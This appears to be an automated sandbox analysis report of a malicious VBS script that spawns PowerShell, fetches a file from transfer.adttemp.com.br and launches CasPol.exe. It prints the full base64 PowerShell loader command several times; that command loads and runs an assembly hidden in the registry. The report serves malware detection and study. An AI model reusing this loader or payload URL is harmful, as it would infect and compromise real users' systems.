                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3552, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA, ProcessId: 6500, ProcessName: powershell.exe
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsAvira: detected
                  Source: transfer.adttemp.com.brVirustotal: Detection: 6%Perma Link
                  Source: http://transfer.adttemp.com.brVirustotal: Detection: 6%Perma Link
                  Source: nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsReversingLabs: Detection: 60%
                  Source: nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsVirustotal: Detection: 50%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                  Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49872 version: TLS 1.2
                  Source: Binary string: BFD4.pdb source: powershell.exe, 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.3372776875.000001A9BB668000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficHTTP traffic detected: GET /qcExh/99gram.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /qcExh/99gram.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: transfer.adttemp.com.br
                  Source: powershell.exe, 00000003.00000002.3343374740.000001A9AB33B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: powershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AB661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AB4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AD0D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.adttemp.com.br
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AB661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AB4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AB661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9AD3B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000003.00000002.3372776875.000001A9BB53C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9ACC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br
                  Source: powershell.exe, 00000003.00000002.3343659186.000001A9ACC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.adttemp.com.br/qcExh/99gram.txt
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49872 version: TLS 1.2

                  System Summary

                  barindex
                  Source: Process Memory Space: powershell.exe PID: 6500, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E8F7ED3_2_00007FF848E8F7ED
                  Source: nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsInitial sample: Strings found which are bigger than 50
                  Source: Process Memory Space: powershell.exe PID: 6500, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@14/3@1/1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12t2j1hg.zvy.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsReversingLabs: Detection: 60%
                  Source: nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbsVirustotal: Detection: 50%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nos#U016bt#U012b#U0161anas dokuments r#U0113#U0137inam Nr.52-FK-24.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsAJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Caspol.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: BFD4.pdb source: powershell.exe, 00000003.00000002.3382819373.000001A9C3610000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.3372776875.000001A9BB668000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Unsupported parameter type 00000000", "0", "false");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IHost.Sleep("1000");IWshShell3.RegRead("HKCU\SOFTWARE\NYANxCAT\NYANxCAT");IWshShell3.RegWrite("HKCU\SOFTWARE\NYANxCAT\NYANxCAT", "==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");IWshShell3.Run("Unsupported parameter type 00000000", "0", "false");IWshShell3.Run("Powershell -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAA", "0", "false")
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E87848 push eax; iretd 3_2_00007FF848E8786D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848E87828 push eax; iretd 3_2_00007FF848E8786D
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
